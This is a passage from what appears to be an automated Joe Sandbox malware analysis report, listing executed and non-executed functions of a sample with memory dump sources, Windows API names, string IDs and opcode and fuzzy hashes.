                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57c2c4b4067f487da02ee57e8c6367b5d15013a29cd3414ac047bd2cce026e08
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3621A521B0869195EE10BE2265043BAE662BF45BE4FCC5430EE8D27B86CEBDE045C634
                                                                                                                                                                                                                                                                    Function 00007FF7C267B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                                    • Instruction ID: 2047142ebe03a124250fb7c8311e13d22de2ff8ee8584a4d41f06ab39dcd6330
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6318022A18A4285F7517F65A84137CA662AB80FB4FC54135EAAD23BD2DFFCE441C731
                                                                                                                                                                                                                                                                    Function 00007FF7C2676004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                    • Instruction ID: 8f912d2385c3f88dae71ea351b3bfd1e3355e7a2a62527987b0eac9727fe491f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB111A22A1864181EA61BF51A40027EE266EF85FA4FC44075EE8C67F96DFBDD840CB31
                                                                                                                                                                                                                                                                    Function 00007FF7C26863C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                    • Instruction ID: c34f2c8fae4a3dc3146a2f8a38d8bfcd3162a30be87cbc6ee9328ec7bc1074e2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82219872618641C7D761AF18E440379B6A2FB84B64F944234D6DD57BD9DF7CD400CB20
                                                                                                                                                                                                                                                                    Function 00007FF7C267042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                    • Instruction ID: c9456ceb4fe01632cef678d9aadbf77850c5731ad6fc897e8ae8cbd5d41f32ff
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A018E61A0874180EA14FF52A901169E692AF85FF0B984631EEDC27FDADFBCE451C330
                                                                                                                                                                                                                                                                    Function 00007FFB1BA46894 Relevance: 1.5, APIs: 1, Instructions: 19networkCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: send
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2809346765-0
                                                                                                                                                                                                                                                                    • Opcode ID: 857e2324bf16085a4ea68c05b138027c44fdbe11cde1698f6f4c9787cdbcdc49
                                                                                                                                                                                                                                                                    • Instruction ID: ab83dd7347676288d1b8c56f78e1102c8d155cf452a2ee57fdd349bdf08766b2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 857e2324bf16085a4ea68c05b138027c44fdbe11cde1698f6f4c9787cdbcdc49
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AEE04FF2E24A45C2DB185B66E0442687361F719FB4F68A721DA381B7E0DE38D5E1C740
                                                                                                                                                                                                                                                                    Function 00007FF7C2669070 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2669400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C26645E4,00000000,00007FF7C2661985), ref: 00007FF7C2669439
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00007FF7C2666466,?,00007FF7C266336E), ref: 00007FF7C2669092
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2592636585-0
                                                                                                                                                                                                                                                                    • Opcode ID: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
                                                                                                                                                                                                                                                                    • Instruction ID: d6d3d1b7817508e32ffa06638550218a770239df7310b8dae4dc9363d09245f5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58D08C11B2468581EA54BB77BA4A6299262AFC9BD0F988035EE8D03F5ADC3CC0418B10
                                                                                                                                                                                                                                                                    Function 00007FF7C267D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF7C2670D00,?,?,?,00007FF7C267236A,?,?,?,?,?,00007FF7C2673B59), ref: 00007FF7C267D6AA
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                                    • Instruction ID: 848aef8e66b9ae2dcdc6520eb95cc69ce6eedd6ff6394df9b344bcc75ee78248
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAF03004A0934285FE547F61A85127491D24F54FB0FA80A3098AE65BC1DF9CA480C230

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 00007FFB0C0E42B0 Relevance: 23.2, APIs: 1, Strings: 12, Instructions: 452COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-1067337024
                                                                                                                                                                                                                                                                    • Opcode ID: 5f15b9148e8d691bade7ac4299c338194b5adc1f0a67d16e58ed18eaea73a7c4
                                                                                                                                                                                                                                                                    • Instruction ID: d61872a753dfd97880ad88c1b5927c5980d095bdf1e90bc2b2932f42312dbcef
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f15b9148e8d691bade7ac4299c338194b5adc1f0a67d16e58ed18eaea73a7c4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A0233E2E4C68245FB658BF5D048B792AD1AF52B94F084231CAAF436C2EF3DE545C708
                                                                                                                                                                                                                                                                    Function 00007FFB0C027336 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 332COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                                                                                    • API String ID: 0-2031831958
                                                                                                                                                                                                                                                                    • Opcode ID: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
                                                                                                                                                                                                                                                                    • Instruction ID: 13851b09d8f640b39c63ffd240191f3ef8849bf1d63f7c192e269977d5433dc8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CD103E2A1D69286DB268F38D098F796B95FF54784F4A8035DE8E43786EF2CE540C704
                                                                                                                                                                                                                                                                    Function 00007FFB1B6F6524 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1c345bf4b26225235b4d26d45e61a1bfcc5d62a5fa2cd55c6cf9bacb0669c0dd
                                                                                                                                                                                                                                                                    • Instruction ID: 8fb0e1ad9e59c83323aaf0bbb50137441fa64e44e7299f0e8b2f989c749cb850
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c345bf4b26225235b4d26d45e61a1bfcc5d62a5fa2cd55c6cf9bacb0669c0dd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4313CB2609F8186EB608F71E8503E97361FB95754F44903AEA8E57BA9DF3CD548C700
                                                                                                                                                                                                                                                                    Function 00007FFB0C1ABE40 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5c9d26001853adc99818a0497b1945147b5620d2729c7ee8dba9124f54c33512
                                                                                                                                                                                                                                                                    • Instruction ID: b85f2a7baa0ba5e643515a80f72213aa85457d5be719e4ba631ec002b8514fdf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c9d26001853adc99818a0497b1945147b5620d2729c7ee8dba9124f54c33512
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04315AB6609B8186EB608FA1E8547EE73A1FF84744F44407ADB4E47B98DF38C649C710
                                                                                                                                                                                                                                                                    Function 00007FFB1BB1A9DC Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6b4f96484e9d25cd3f5e70dcb344116a910c5711d29953f1dc89c1487fb3fecb
                                                                                                                                                                                                                                                                    • Instruction ID: 47c185ab55784d4ec65e74d58b38b17c181ce7f81ecb7b74ba7d834f01fc2dc3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b4f96484e9d25cd3f5e70dcb344116a910c5711d29953f1dc89c1487fb3fecb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0314AB6609E81CAEB709F60F8543EA73A5FB84754F00903ADA4D47AA4DF3CD649C710
                                                                                                                                                                                                                                                                    Function 00007FFB1AB04630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFB1AB00000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714712112.00007FFB1AB00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB0E000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB11000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714860777.00007FFB1AB12000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714897323.00007FFB1AB13000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ab00000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                    • Opcode ID: 41411a27d507602669186cf501f180bbbc9ffe95d56815b0de37bc952dd6e872
                                                                                                                                                                                                                                                                    • Instruction ID: c38681a6a6b498fc82b4cf02c5be1663efff621e19b63dc958a2d790cc661b11
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41411a27d507602669186cf501f180bbbc9ffe95d56815b0de37bc952dd6e872
